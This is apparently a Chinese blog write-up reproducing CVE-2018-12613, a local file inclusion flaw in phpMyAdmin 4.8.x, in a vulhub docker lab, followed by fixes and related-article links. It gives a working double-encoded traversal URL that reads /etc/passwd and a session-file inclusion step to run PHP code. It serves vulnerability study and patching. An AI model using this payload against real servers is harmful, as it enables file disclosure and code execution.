PhpMyAdmin文件包含漏洞
目录
漏洞描述
漏洞复现
复现
解决方法
漏洞描述
PhpMyAdmin 是一个用 PHP 编写的免费软件工具,旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中,导致文件包含漏洞。
在phpMyadmin4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 LFI(本地文件包含)漏洞。
受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613。
漏洞复现
使用docker搭建vulhub平台,
运行以下命令启动phpMyadmin4.8.1
docker-compose up -d
环境启动后,访问http://your-ip:8080. phpmyadmin 是“config”模式,所以我们可以直接登录。
复现
访问地址
http://ip:8080
显示结果:
访问地址
http://ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
结果表明存在文件包含漏洞:
我们可以执行SELECT '<?=phpinfo()?>';,
检查session id(cookie 中phpMyAdmin的值)
包含 session 文件:
解决方法
- 更新phpmyadmin版本。
- 删除index.php中使用文件包含的函数。
- 进行输入转码和过滤拦截敏感字符。
- 安装杀毒软件,开启防火墙拦截异常行为。
PhpMyAdmin文件包含漏洞相关推荐
- phpmyadminV4.8.1本地文件包含漏洞复现
文章目录 一.phpMyadmin简介 二.什么是文件包含漏洞? 三.本地包含和远程包含 四.文件包含相关函数介绍 1.函数介绍 2.报错 3._once 4.小结 五.关于windows特性的一个小 ...
- 18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...
- test.php.bak,记一次phpmyadmin 4.8.1 远程文件包含漏洞(BUUCTF web)
题目很简单,一个滑稽 打开源码,发现存在source.php文件 于是访问文件,发现出现一串php源码 提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...
- index.php.bak 颓废_18.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管理工具.其index.php中存在一处文件包含逻辑, ...
- delphi cxgrid读取本地image_技术讨论 | PHP本地文件包含漏洞GetShell
序言 让我们突破重重苛刻环境GetShell,文中有以phpmyadmin包含漏洞做演示. PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负. 漏洞背景 当您在发现PHP本地文件包含 ...
- mysql 多字节编码漏洞_phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
漏洞详情 范围 phpMyAdmin 4.8.0和4.8.1 原理 首先在index.php 50-63行代码 $target_blacklist = array ( 'import.php', 'e ...
- 远程文件包含 php,php本地及远程文件包含漏洞
在php程序中包含有file inclusion的时候,php要开启一下两个功能: allow_url_fopen on allow_url_include on 但是开启这两个功能之后伴随的是url ...
- index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...
- 89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解实战示例]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含漏洞详解 1.文件包含漏洞相关概念 2.PHP文件包含漏洞相关概念 3.PHP文件包含漏洞利用:`构 ...
最新文章
- Android中LayoutInflater的使用
- C# 开发WinCE 遇到Motorola PDA 的问题记录
- 数字图像处理实验(12):PROJECT 05-03,Periodic Noise Reduction Using a Notch Filter
- 【小练习06】HTML+CSS--电影公告
- 目前对Learning to Rank 最全面的总结
- Spring 中获取servletContext及WebApplicationContext以及applicationContext三者之间的关系
- iOS中AutoLayer自动布局流程及相关方法
- java 贪吃蛇 控制台_控制台游戏贪吃蛇Java版
- 03-21 webview 性能分析
- js map的get 和list比 那个快_js中let和var
- Church's Coupon Performance Test Script
- android小米推送,Android集成小米推送
- RM3100 stm32 hal库 spi 磁力计数据
- 评价模型总结——个人学习笔记(二)
- 青出于蓝而胜于蓝——揭秘全新的 HWSQL
- pip 按照requirements.txt安装到对应的package名称的文件中
- Mysql序号 查询
- ALK8266WIFI解决方案支持常见普通单片机实现WIFI高速传输和许多实用功能,实测速度超过M字节每秒
- SIMT和SIMD之总结篇
- Cannot enable Hyper-V service